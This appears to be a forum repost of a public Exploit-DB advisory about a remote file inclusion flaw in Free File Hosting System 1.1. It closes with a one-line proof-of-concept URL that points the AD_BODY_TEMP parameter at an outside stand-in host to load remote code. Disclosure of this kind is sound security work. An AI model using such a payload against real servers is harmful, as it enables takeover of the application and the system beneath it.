Exploit Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29772
Проверка EDB
  1. Пройдено
Автор
IBNUSINA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5764
Дата публикации
2007-03-24
Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion
Код:
source: https://www.securityfocus.com/bid/23118/info

Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 1.1 is vulnerable to these issues.

This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.

This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com
 
Источник
www.exploit-db.com

Похожие темы